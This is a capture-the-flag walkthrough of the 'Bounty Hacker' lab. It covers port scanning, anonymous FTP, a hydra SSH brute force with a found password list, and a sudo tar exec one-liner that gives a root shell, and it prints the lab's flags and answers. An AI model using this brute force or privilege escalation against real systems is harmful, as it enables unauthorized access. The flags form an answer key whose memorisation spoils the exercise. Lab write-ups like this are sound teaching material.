Writeup Aria
challengesB2rEasy

Bounty Hacker

You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!

solution

Enumeration

HOST=10.49.102.4
TARGET=10.49.131.64

nmap -sV -p- $TARGET
# PORT   STATE SERVICE VERSION
# 21/tcp open  ftp     vsftpd 3.0.5
# 22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
# 80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

FTP - Anonymous Login

ftp $TARGET
# name: Anonymous

ls
# -rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
# -rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt

get task.txt
cat task.txt
exit

cat task.txt
# 1.) Protect Vicious.
# 2.) Plan for Red Eye pickup on the moon.

# -lin

cat locks.txt
# rEddrAGON
# ReDdr4g0nSynd!cat3
# Dr@gOn$yn9icat3
# R3DDr46ONSYndIC@Te
# ReddRA60N
# R3dDrag0nSynd1c4te
# dRa6oN5YNDiCATE
# ReDDR4g0n5ynDIc4te
# R3Dr4gOn2044
# RedDr4gonSynd1cat3
# R3dDRaG0Nsynd1c@T3
# Synd1c4teDr@g0n
# reddRAg0N
# REddRaG0N5yNdIc47e
# Dra6oN$yndIC@t3
# 4L1mi6H71StHeB357
# rEDdragOn$ynd1c473
# DrAgoN5ynD1cATE
# ReDdrag0n$ynd1cate
# Dr@gOn$yND1C4Te
# RedDr@gonSyn9ic47e
# REd$yNdIc47e
# dr@goN5YNd1c@73
# rEDdrAGOnSyNDiCat3
# r3ddr@g0N
# ReDSynd1ca7e

SSH - Bruteforce with rockyou.txt and found passwords

hydra -l lin -P locks.txt ssh://$TARGET
# [22][ssh] host: 10.49.131.64   login: lin   password: RedDr4gonSynd1cat3

ssh lin@$TARGET
# password: RedDr4gonSynd1cat3

cat user.txt
# THM{CR1M3_SyNd1C4T3}

Privilege Escalation

sudo -l
# User lin may run the following commands on ip-10-49-131-64:
    # (root) /bin/tar
sudo tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
whoami
# root

cat /root/root.txt
# THM{80UN7Y_h4cK3r}

Answer Questions

Living up to the title.

You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they'd take you up on claims! Prove your status is more than just a few glasses at the bar. I sense bell peppers & beef in your future!

  • Who wrote the task list?

lin

  • What service can you bruteforce with the text file found?

SSH

  • What is the users password?

RedDr4gonSynd1cat3

  • user.txt

THM{CR1M3_SyNd1C4T3}

  • root.txt

THM{80UN7Y_h4cK3r}

On this page